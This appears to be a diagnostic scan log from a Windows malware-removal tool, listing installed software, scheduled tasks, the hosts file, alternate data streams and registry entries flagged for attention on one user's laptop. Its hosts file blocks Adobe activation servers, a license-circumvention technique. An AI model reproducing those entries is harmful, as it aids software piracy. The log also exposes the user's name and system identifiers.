Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.50727 (Version: 11.0.50727 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.50727 (Version: 11.0.50727 - Microsoft Corporation) Hidden
Microsoft Web Publishing Wizard 1.52 (HKLM-x32\...\WebPost) (Version:  - )
Microsoft_VC80_ATL_x86 (x32 Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_ATL_x86_x64 (Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_CRT_x86 (x32 Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_CRT_x86_x64 (Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_MFC_x86 (x32 Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_MFC_x86_x64 (Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_MFCLOC_x86 (x32 Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_MFCLOC_x86_x64 (Version: 80.50727.4053 - Adobe) Hidden
Microsoft_VC90_ATL_x86 (x32 Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_ATL_x86_x64 (Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_CRT_x86 (x32 Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_CRT_x86_x64 (Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_MFC_x86 (x32 Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_MFC_x86_x64 (Version: 1.00.0000 - Adobe) Hidden
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT_amd64 (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.1.0 - Nikon)
Nikon Movie Editor (HKLM-x32\...\{5CAD3393-EEC0-44CE-9F93-BCAA365B77FB}) (Version: 2.7.0 - Nikon)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.6.3 - Notepad++ Team)
OtsAV DJ 1.90.015 (HKLM-x32\...\OtsAV DJ) (Version:  - )
PC Pitstop Optimize3 3.0 (HKLM-x32\...\PC Pitstop Optimize3_is1) (Version: 3.0.0.42 - PC Pitstop)
PDF Settings CS5 (x32 Version: 10.0 - Adobe Systems Incorporated) Hidden
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
Picture Control Utility x64 (HKLM\...\{11953C65-BB4E-4CA4-B0F0-2600A4B20040}) (Version: 1.4.11 - Nikon)
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
POOL Player (HKLM-x32\...\com.promoonly.online.POOL.8BB1F44190BE209F9DAD807CFDEF7E1135FDA399.1) (Version: Version 3.3.18 - Promo Only, Inc.)
POOL Player (x32 Version: 3.3.18 - Promo Only, Inc.) Hidden
PrimoPDF -- brought to you by Nitro PDF Software (HKLM-x32\...\PrimoPDF) (Version: 5 - Nitro PDF Software)
PxMergeModule (x32 Version: 1.00.0000 - Your Company Name) Hidden
QandAi-II (HKLM-x32\...\{B4B882C8-A973-4736-A14C-E36E5B694818}) (Version: 1.0.3 - DigiGames)
QATI (HKLM-x32\...\{1C7C16F9-4B70-49CB-88C8-569BA7C24D0B}) (Version: 6.0.0004 - DigiGames)
QATI (HKLM-x32\...\{7DD2847D-CB78-40CB-97A5-15E604539E78}) (Version: 6.0.0010 - DigiGames)
Qualcomm Gobi 2000 Package for Dell (HKLM-x32\...\{5030C973-F5BA-4432-860C-A3DA77BFEB05}) (Version: 1.1.100 - QUALCOMM)
Quicken 2011 (HKLM-x32\...\{5FE545A1-D215-4216-9189-E7B39C9D1CC1}) (Version: 20.1.8.6 - Intuit)
Quicken 2012 (HKLM-x32\...\{0A1E0BDA-5E8F-436d-8BE5-7E97C5CB899D}) (Version: 21.1.7.18 - Intuit)
Quicken 2013 (HKLM-x32\...\{034DD4BB-F0D6-4ECF-B064-8E39E3EF7076}) (Version: 22.1.12.7 - Intuit)
Quicken 2014 (HKLM-x32\...\{0877F595-254F-45F4-991D-3F72E86B17CE}) (Version: 23.1.7.6 - Intuit)
Quicken WillMaker Plus 2013 (HKLM-x32\...\{8065044B-2AF3-434E-A6E2-B7C60CDB978B}) (Version: 1.0.0.0 - Nolo)
Quickset64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 9.6.21 - Dell Inc.)
QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
QuizMaster (HKLM-x32\...\{B1C7D7DC-CDAB-4540-8600-BCE5A553C179}) (Version: 1.0.4102 - DIGIGAMES)
R3DriverInstall (HKLM-x32\...\R3DriverInstall_is1) (Version:  - )
RBVirtualFolder64Inst (Version: 1.00.0000 - Roxio, Inc.) Hidden
RICOH Media Driver ver.2.07.01.02 (HKLM-x32\...\{2B818257-E6C7-4841-8C29-C5C9A982BCE5}) (Version: 2.07.01.02 - RICOH)
Roxio BackOnTrack (x32 Version: 4.0 - Roxio) Hidden
Roxio Burn (x32 Version: 1.6 - Roxio) Hidden
Roxio CinePlayer (x32 Version: 5.6 - Roxio) Hidden
Roxio CinePlayer Decoder Pack (x32 Version: 4.3.0 - Roxio) Hidden
Roxio Creator 2011 (HKLM-x32\...\{4433FF9E-AF21-4E41-B296-4E13BF4D52F5}) (Version: 13.0 - Roxio)
Roxio Creator 2011 (x32 Version: 1.3.166 - Roxio) Hidden
Roxio Creator 2011 (x32 Version: 6.0.0 - Roxio) Hidden
Roxio Creator 2011 Content (x32 Version: 13.0.098 - Roxio) Hidden
Roxio PhotoShow (HKLM-x32\...\Roxio PhotoShow) (Version: 6.0 - Sonic Solutions)
Roxio Video Capture USB (x32 Version: 1.22.0000 - Roxio) Hidden
Safari (HKLM-x32\...\{C779648B-410E-4BBA-B75B-5815BCEFE71D}) (Version: 5.34.57.2 - Apple Inc.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (Version:  - Microsoft) Hidden
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
SmartSound Common Data (HKLM-x32\...\InstallShield_{B8A2869E-30CA-40C5-9CF8-BD7354E57EF8}) (Version: 1.1.0 - SmartSound Software Inc.)
SmartSound Common Data (x32 Version: 1.1.0 - SmartSound Software Inc.) Hidden
SmartSound Quicktracks 5 (HKLM-x32\...\InstallShield_{2F8BA3FD-1FA9-4279-B696-712ABB12F09F}) (Version: 5.1.7 - SmartSound Software Inc.)
SmartSound Quicktracks 5 (x32 Version: 5.1.7 - SmartSound Software Inc.) Hidden
Take It Or Leave It (HKLM-x32\...\Take It Or Leave It_is1) (Version:  - )
TalentHunt (HKLM-x32\...\{F8E2027F-FBB9-4902-9045-25C63F38028F}) (Version: 1.0.11 - DIGIGAMES)
The Print Shop 23.1 (HKLM-x32\...\{0C8C6F56-41FA-44F6-8107-DCFAA7EFD601}) (Version: 23.1.11 - Broderbund Software)
Total Commander 64-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 8.51a - Ghisler Software GmbH)
Trivia Board Pro 4 (HKLM-x32\...\Trivia Board Pro 4_is1) (Version:  - )
Trivia Feud (HKLM-x32\...\Trivia Feud_is1) (Version:  - )
Trivia Fortune (HKLM-x32\...\Trivia Fortune_is1) (Version:  - )
Trivia Ladder (HKLM-x32\...\Trivia Ladder_is1) (Version:  - )
Trivia Squares (HKLM-x32\...\Trivia Squares_is1) (Version:  - )
Tweaking.com - Windows Repair (All in One) (HKLM-x32\...\Tweaking.com - Windows Repair (All in One)) (Version: 2.8.0 - Tweaking.com)
Update for Microsoft Access 2010 (KB2553446) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{FEF4C57D-0975-4D3C-ACC7-DCD038C3788F}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{84B191B5-5319-463A-A305-8C4D53B1D20A}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817369) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{DB0B0CDF-77EC-47B0-94E2-4738573A1E58}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2494150) (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{428CB7A0-1068-4CE1-8835-39C7ECD297ED}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{79C725A1-3964-421C-A528-78C1C083C7C7}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{95BE5D45-A3DD-4CB1-8C35-D75DD7B4D862}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.SingleImage_{95BE5D45-A3DD-4CB1-8C35-D75DD7B4D862}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{EBD18DE5-BC84-4B57-9A30-097044871F9A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{4AD36582-256B-433D-8593-F31773A15CA4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.SingleImage_{4AD36582-256B-433D-8593-F31773A15CA4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{F216169C-2B40-429B-8370-B5BA06EC5423}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.SingleImage_{F216169C-2B40-429B-8370-B5BA06EC5423}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{B6AD7E27-012A-4B63-82BA-AF62893E5435}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{07DC9C6C-E916-4F42-8677-716930ED0393}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825635) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{6E760BBA-B83F-4C2D-918F-5F91EF6C9861}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2850079) 64-Bit Edition (HKLM\...\{90140000-001F-040C-1000-0000000FF1CE}_Office14.SingleImage_{9F6507AC-7D8F-46C1-B90F-59C7828E0E0D}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2850079) 64-Bit Edition (HKLM\...\{90140000-001F-0C0A-1000-0000000FF1CE}_Office14.SingleImage_{E84E9B25-BEB6-4F2F-84BB-755CDA8E89C0}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878225) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{8A6BDA63-4D23-4485-A466-8979E10BCF49}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878225) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.SingleImage_{8A6BDA63-4D23-4485-A466-8979E10BCF49}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{3029C408-1DD1-4273-8E58-87CB1B638FC8}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.SingleImage_{3029C408-1DD1-4273-8E58-87CB1B638FC8}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 64-Bit Edition (HKLM\...\{90140000-001A-0409-1000-0000000FF1CE}_Office14.SingleImage_{DBAC8ED2-9287-499E-AD66-590C7413C7DE}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{DDDC32A5-9528-4771-B91A-97A8E1D7957B}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 64-Bit Edition (HKLM\...\{90140000-0018-0409-1000-0000000FF1CE}_Office14.SingleImage_{393B360E-62F8-463D-B914-1ECDC1359A46}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{A20A650C-F820-4CE4-AEA5-EC140192FAFB}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.SingleImage_{77374F16-2DC6-4EEF-AFAD-C59FDA2E010D}) (Version:  - Microsoft)
Update for Microsoft Visio 2010 (KB2880526) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{F6F342A1-530B-4D48-A468-1E3F70928984}) (Version:  - Microsoft)
Update for Microsoft Visio Viewer 2010 (KB2837587) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{C950A55F-82E3-4CC8-8FA2-E8A2A0F651F3}) (Version:  - Microsoft)
Update for Microsoft Word 2010 (KB2880529) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{89FDC8D9-FB84-4EFE-950D-AF4EECC3B64C}) (Version:  - Microsoft)
VD64Inst (Version: 1.00.0000 - Roxio, Inc.) Hidden
ViewNX 2 (HKLM\...\{635BE602-BB9C-4C59-8CC5-93F9366E8A21}) (Version: 2.7.5 - Nikon)
WIDCOMM Bluetooth Software (HKLM\...\{9E9D49A4-1DF4-4138-B7DB-5D87A893088E}) (Version: 6.2.0.9600 - Broadcom Corporation)
Windows Live Communications Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Family Safety (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4225.0 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Language Selector (Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Mail (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mesh (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Live Messenger (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Messenger Companion Core (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live MIME IFilter (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Movie Maker (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Remote Client (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Client Resources (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Service (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Service Resources (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Writer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Writer Resources (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Media Center Add-in for Flash (HKLM-x32\...\{E2D09AC2-4153-4817-AAEB-24F92A8BCE88}) (Version: 4.1.2.0 - Microsoft Corporation)
Windows Media Player Firefox Plugin (HKLM-x32\...\{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp)

==================== Restore Points  =========================

05-07-2014 23:54:40 Windows Backup
14-07-2014 15:20:40 Tweaking.com - Windows Repair
14-07-2014 16:38:39 Tweaking.com - Windows Repair
15-07-2014 18:17:55 Windows Backup
15-07-2014 18:50:28 Windows Backup

==================== Hosts content: ==========================

2009-07-13 22:34 - 2011-12-12 11:44 - 00001509 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost
127.0.0.1 activate.adobe.com
127.0.0.1 practivate.adobe.com
127.0.0.1 ereg.adobe.com
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 wip3.adobe.com
127.0.0.1 3dns-3.adobe.com
127.0.0.1 3dns-2.adobe.com
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 ereg.wip3.adobe.com
127.0.0.1 activate-sea.adobe.com
127.0.0.1 wwis-dubc1-vip60.adobe.com
127.0.0.1 activate-sjc0.adobe.com
127.0.0.1 adobe.activate.com
127.0.0.1 adobeereg.com
127.0.0.1 www.adobeereg.com
127.0.0.1 wwis-dubc1-vip60.adobe.com
127.0.0.1 125.252.224.90
127.0.0.1 125.252.224.91
127.0.0.1 hl2rcv.adobe.com

==================== Scheduled Tasks (whitelisted) =============

Task: {00D1E803-9EB0-4DAB-8FD2-5A70367A90A8} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001UA => C:\Users\Ric\AppData\Local\Google\Update\GoogleUpdate.exe [2011-08-28] (Google Inc.)
Task: {1E99649A-5C34-41E6-9D5C-6B6A1C1C3CCC} - \Scheduled Update for Ask Toolbar No Task File <==== ATTENTION
Task: {301A0A26-686A-47AB-8410-BA6B7A51D46D} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {31482516-5CE1-494C-A9DE-CDA22FC32E49} - System32\Tasks\{5F6010C8-60E5-41f3-BF5B-C3AF5DBE12D4} => C:\ProgramData\Carbonite\Carbonite Backup\CarboniteUpgrade.exe
Task: {384DE5BC-5F63-40D3-ABB4-A297FBB546AF} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\My Dell\uaclauncher.exe [2014-01-10] (PC-Doctor, Inc.)
Task: {41139198-1592-4711-A556-F3852D5D33BD} - System32\Tasks\Carbonite Upgrade Check => C:\ProgramData\Carbonite\Carbonite Backup\CarboniteUpgrade.exe
Task: {4773C2E6-2290-4912-8954-305C9DE708C6} - System32\Tasks\Apple Diagnostics => C:\Program Files (x86)\Common Files\Apple\Internet Services\EReporter.exe [2013-11-20] (Apple Inc.)
Task: {538F0BF6-C5B5-445F-8E21-0540E20500AE} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-10-06] (Google Inc.)
Task: {5C883933-4F04-48F9-A1AF-A77BC1A98103} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-10-06] (Google Inc.)
Task: {92F87B66-E033-4923-80DC-C27F79A8B290} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001Core => C:\Users\Ric\AppData\Local\Google\Update\GoogleUpdate.exe [2011-08-28] (Google Inc.)
Task: {C76636F5-BADB-4669-B87E-90AF0058C63C} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {C91124DE-30E0-4E60-A6E0-AB710876F70F} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-01-10] (PC-Doctor, Inc.)
Task: {E2BF828E-529C-4297-97BC-9AE74B9BE264} - System32\Tasks\AdobeAAMUpdater-1.0-Dell-XPS-1645-Ric => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2010-03-06] (Adobe Systems Incorporated)
Task: {F2AD24AB-2A5C-4290-B252-B4E6EF0391E5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-06-13] (Adobe Systems Incorporated)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001Core.job => C:\Users\Ric\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001UA.job => C:\Users\Ric\AppData\Local\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2009-06-02 19:05 - 2009-06-02 19:05 - 00457200 _____ () C:\Program Files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe
2010-07-14 04:00 - 2010-07-14 04:00 - 00032240 _____ () C:\Program Files (x86)\Roxio\BackOnTrack\App\BService.exe
2011-02-27 20:25 - 2007-08-02 19:45 - 00262239 _____ () C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLCapSvc.exe
2013-05-23 17:54 - 2011-09-06 07:02 - 00140456 _____ () C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
2014-05-12 05:49 - 2014-05-12 05:49 - 00222720 _____ () C:\Program Files (x86)\Notepad++\NppShell_06.dll
2014-06-16 09:38 - 2009-11-26 11:53 - 00447488 ____R () C:\Program Files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe
2011-02-27 20:25 - 2007-08-02 19:46 - 00110685 _____ () C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLSched.exe
2014-01-20 14:17 - 2014-01-20 14:17 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-01-20 14:16 - 2014-01-20 14:16 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2010-07-14 04:00 - 2010-07-14 04:00 - 01587696 _____ () C:\Program Files (x86)\Roxio\BackOnTrack\App\BEngine.dll
2010-07-14 04:00 - 2010-07-14 04:00 - 00107504 _____ () C:\Program Files (x86)\Roxio\BackOnTrack\App\Logging.dll
2011-02-27 20:25 - 2007-08-02 19:46 - 00233573 _____ () C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLCapEngine.dll
2011-02-27 20:25 - 2007-08-02 19:46 - 00032768 _____ () C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLCapSvcps.dll
2014-07-16 10:41 - 2014-07-16 10:41 - 00043008 _____ () c:\users\ric\appdata\local\temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpwjih6l.dll
2013-08-23 15:01 - 2013-08-23 15:01 - 25100288 _____ () C:\Users\Ric\AppData\Roaming\Dropbox\bin\libcef.dll
2014-06-16 09:38 - 2009-03-25 20:08 - 00058880 ____R () C:\Program Files (x86)\Dell\Dell WWAN\WMCore\MBMDebug.dll
2011-02-27 20:25 - 2007-08-02 19:46 - 00065631 _____ () C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLSchMgr.dll
2014-02-13 10:22 - 2014-02-13 10:22 - 00170496 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\bfd5296be62268bc7a31a424f0d1ad5f\IsdiInterop.ni.dll
2011-02-26 00:00 - 2010-03-03 21:08 - 00058880 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll

==================== Alternate Data Streams (whitelisted) =========

AlternateDataStreams: C:\Users\Ric\Local Settings:eze3UMfrJWx7rnYl4ZabQcSdDo9
AlternateDataStreams: C:\Users\Ric\AppData\Local:eze3UMfrJWx7rnYl4ZabQcSdDo9
AlternateDataStreams: C:\Users\Ric\AppData\Local\Application Data:eze3UMfrJWx7rnYl4ZabQcSdDo9
AlternateDataStreams: C:\Users\Ric\AppData\Local\QX98MGlBll:ICLtGXGuvbHk9JsjsurofG6fTog
AlternateDataStreams: C:\Users\Ric\AppData\Local\Temp:u7mOtr3DxOBSIqOEV

==================== Safe Mode (whitelisted) ===================

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\51887692.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\51887692.sys => ""="Driver"

==================== EXE Association (whitelisted) =============

HKU\S-1-5-21-3536542363-2189832666-3084334477-1001\Software\Classes\.exe: exefile =>  <===== ATTENTION!
HKU\S-1-5-21-3536542363-2189832666-3084334477-1001\Software\Classes\exefile:  <===== ATTENTION!

==================== MSCONFIG/TASK MANAGER disabled items =========

MSCONFIG\Services: x10nets => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Bluetooth.lnk => C:\Windows\pss\Bluetooth.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Event Reminder.lnk => C:\Windows\pss\Event Reminder.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
